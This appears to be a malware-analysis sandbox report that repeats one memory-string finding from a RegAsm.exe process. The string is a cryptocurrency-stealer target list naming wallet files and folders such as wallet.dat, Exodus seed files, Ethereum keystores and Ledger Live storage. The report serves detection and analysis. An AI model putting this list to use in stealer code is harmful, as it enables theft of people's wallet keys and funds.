Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger 